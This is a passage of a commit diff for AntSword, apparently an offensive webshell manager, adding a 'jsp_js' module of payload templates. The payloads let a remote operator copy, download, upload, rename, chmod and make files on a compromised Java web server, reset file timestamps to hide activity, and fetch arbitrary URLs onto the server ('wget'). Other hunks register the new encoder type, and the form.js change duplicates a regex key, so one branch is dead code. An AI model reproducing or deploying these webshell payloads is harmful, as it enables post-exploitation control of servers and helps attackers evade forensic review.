[arg1]: "#{newbase64::path}",
},
copy: {
_: `
function CopyFileOrDirCode(sourceFilePath, targetFilePath) {
var sf = new File(sourceFilePath),
df = new File(targetFilePath);
if (sf.isDirectory()) {
if (!df.exists()) {
df.mkdir();
}
var z = sf.listFiles();
for (var j = 0; j < z.length; j++) {
CopyFileOrDirCode(
sourceFilePath + "/" + z[j].getName(),
targetFilePath + "/" + z[j].getName()
);
}
} else {
var is = new FileInputStream(sf);
var os = new FileOutputStream(df);
var n;
var byteArray = Java.type("byte[]");
var b = new byteArray(1024);
while ((n = is.read(b, 0, 1024)) != -1) {
os.write(b, 0, n);
}
is.close();
os.close();
}
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(CopyFileOrDirCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::target}",
},
download_file: {
_: `
function DownloadFileCode(filePath, r) {
var n;
var byteArray = Java.type("byte[]");
var b = new byteArray(512);
r.reset();
var os = r.getOutputStream();
var is = new BufferedInputStream(new FileInputStream(filePath));
os.write(tag_s.getBytes());
while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);
}
os.write(tag_e.getBytes());
os.close();
is.close();
}
var z1 = decode(request.getParameter("${arg1}"));
output.append(DownloadFileCode(z1, response));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
},
upload_file: {
_: `
function UploadFileCode(savefilePath, fileHexContext) {
var h = "0123456789ABCDEF";
var f = new File(savefilePath);
f.createNewFile();
var os = new FileOutputStream(f, true);
for (var i = 0; i < fileHexContext.length(); i += 2) {
os.write(
(h.indexOf(fileHexContext.charAt(i)) << 4) |
h.indexOf(fileHexContext.charAt(i + 1))
);
}
os.close();
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(UploadFileCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{buffer::content}",
},
rename: {
_: `
function RenameFileOrDirCode(oldName, newName) {
var sf = new File(oldName),
df = new File(newName);
sf.renameTo(df);
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(RenameFileOrDirCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::name}",
},
retime: {
_: `
function ModifyFileOrDirTimeCode(fileOrDirPath, aTime) {
var f = new File(fileOrDirPath);
var fm = new java.text.SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
var dt = fm.parse(aTime);
f.setLastModified(dt.getTime());
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(ModifyFileOrDirTimeCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::time}",
},
chmod: {
_: `
function ChmodCode(path, permstr) {
try {
var permissions = Integer.parseInt(permstr, 8);
var f = new File(path);
if ((permissions & 256) > 0) {
f.getClass().getDeclaredMethod("setReadable").invoke(f, true, true);
}
if ((permissions & 128) > 0) {
f.getClass().getDeclaredMethod("setWritable").invoke(f, true, true);
}
if ((permissions & 64) > 0) {
f.getClass().getDeclaredMethod("setExecutable").invoke(f, true, true);
}
if ((permissions & 32) > 0) {
f.getClass().getDeclaredMethod("setReadable").invoke(f, true, false);
}
if ((permissions & 16) > 0) {
f.getClass().getDeclaredMethod("setWritable").invoke(f, true, false);
}
if ((permissions & 8) > 0) {
f.getClass().getDeclaredMethod("setExecutable").invoke(f, true, false);
}
if ((permissions & 4) > 0) {
f.getClass().getDeclaredMethod("setReadable").invoke(f, true, false);
}
if ((permissions & 2) > 0) {
f.getClass().getDeclaredMethod("setWritable").invoke(f, true, false);
}
if ((permissions & 1) > 0) {
f.getClass().getDeclaredMethod("setExecutable").invoke(f, true, false);
}
} catch (e) {
return "0";
}
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(ChmodCode(z1, z2));`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::mode}",
},
mkdir: {
_: `
function CreateDirCode(dirPath) {
var f = new File(dirPath);
f.mkdir();
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
output.append(CreateDirCode(z1));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
},
wget: {
_: `
function WgetCode(urlPath, saveFilePath) {
var u = new java.net.URL(urlPath);
var n = 0;
var os = new FileOutputStream(saveFilePath);
var h = u.openConnection();
var is = h.getInputStream();
var byteArray = Java.type("byte[]");
var b = new byteArray(1024);
while ((n = is.read(b)) != -1) {
os.write(b, 0, n);
}
os.close();
is.close();
h.disconnect();
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(WgetCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::url}",
[arg2]: "#{newbase64::path}",
},
});
source/modules/database/jsp_js/index.js 0 → 100644
View file @ a6efa86f
This diff is collapsed.
source/modules/settings/encoders.js
View file @ a6efa86f
......@@ -65,6 +65,11 @@ class Encoders {
icon: 'file-code-o',
type: 'button',
text: "JSP"
}, {
id: 'new_jsp_js',
icon: 'file-code-o',
type: 'button',
text: "JSP_JS"
}, {
type: 'separator'
}, {
......@@ -96,6 +101,11 @@ class Encoders {
icon: 'file-code-o',
type: 'button',
text: "JSP"
}, {
id: 'new_jsp_js_decoder',
icon: 'file-code-o',
type: 'button',
text: "JSP_JS"
}, {
type: 'separator'
}, {
......@@ -143,6 +153,9 @@ class Encoders {
case "new_jsp":
that.createEncoder(id);
break;
case "new_jsp_js":
that.createEncoder(id);
break;
case "new_php":
case "new_php_rsa":
that.createEncoder(id);
......@@ -156,6 +169,9 @@ class Encoders {
case "new_jsp_decoder":
that.createEncoder(id, 'decoder');
break;
case "new_jsp_js_decoder":
that.createEncoder(id, 'decoder');
break;
case "new_custom_decoder":
that.createEncoder(id, 'decoder');
break;
......@@ -195,6 +211,7 @@ class Encoders {
combobox.put("aspx", "ASPX");
combobox.put("php", "PHP");
combobox.put("jsp", "JSP");
combobox.put("jsp_js", "JSP_JS");
combobox.put("custom", "CUSTOM");
grid.attachEvent("onEditCell", function (stage, rId, cInd, nValue, oValue) {
......@@ -226,7 +243,7 @@ class Encoders {
break
case 2:
// type
if (nValue != "asp" && nValue != "aspx" && nValue != "php" && nValue != "jsp"&& nValue != "custom") {
if (nValue != "asp" && nValue != "aspx" && nValue != "php" && nValue != "jsp"&& nValue != "jsp_js"&&nValue != "custom") {
toastr.error(LANG['message']["etype_error"], LANG_T['error']);
return
}
......@@ -766,6 +783,7 @@ module.exports = {
aspx: [],
php: [],
jsp: [],
jsp_js: [],
custom: []
};
var encoders_path = {
......@@ -773,6 +791,7 @@ module.exports = {
aspx: [],
php: [],
jsp: [],
jsp_js: [],
custom: []
};
let userencoder_path = path.join(remote.process.env.AS_WORKDIR, 'antData/encoders');
......@@ -780,7 +799,7 @@ module.exports = {
!fs.existsSync(userencoder_path) ?
fs.mkdirSync(userencoder_path) :
null;
['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
['asp', 'aspx', 'php', 'jsp','jsp_js' , 'custom'].map((t) => {
!fs.existsSync(path.join(userencoder_path, `${t}`)) ?
fs.mkdirSync(path.join(userencoder_path, `${t}`)) :
null;
......@@ -815,6 +834,7 @@ module.exports = {
aspx: [],
php: [],
jsp: [],
jsp_js: [],
custom: []
};
var decoders_path = {
......@@ -822,6 +842,7 @@ module.exports = {
aspx: [],
php: [],
jsp: [],
jsp_js: [],
custom: []
};
let userdecoder_path = path.join(remote.process.env.AS_WORKDIR, 'antData/encoders');
......@@ -829,7 +850,7 @@ module.exports = {
!fs.existsSync(userdecoder_path) ?
fs.mkdirSync(userdecoder_path) :
null;
['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
['asp', 'aspx', 'php', 'jsp','jsp_js', 'custom'].map((t) => {
!fs.existsSync(path.join(userdecoder_path, `${t}`)) ?
fs.mkdirSync(path.join(userdecoder_path, `${t}`)) :
null;
......
source/modules/shellmanager/list/form.js
View file @ a6efa86f
......@@ -268,6 +268,7 @@ class Form {
"aspx": /.+\.as(px|mx)/,
"asp": /.+\.(as(p|a|hx)|c(dx|er))/,
"jsp": /.+\.(jsp[x]?)/,
"jsp": /.+\.(jsp[x]?)/,
"custom": /.+\.((jsp[x]?)|cgi)/
}
let typecombo = form.getCombo('type');
......@@ -279,6 +280,8 @@ class Form {
typecombo.selectOption(typecombo.getOption('asp').index);
} else if (file_match.jsp.test(id) == true) {
typecombo.selectOption(typecombo.getOption('jsp').index);
} else if (file_match.jsp.test(id) == true) {
typecombo.selectOption(typecombo.getOption('jsp_js').index);
} else if (file_match.custom.test(id) == true) {
typecombo.selectOption(typecombo.getOption('custom').index);
}
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment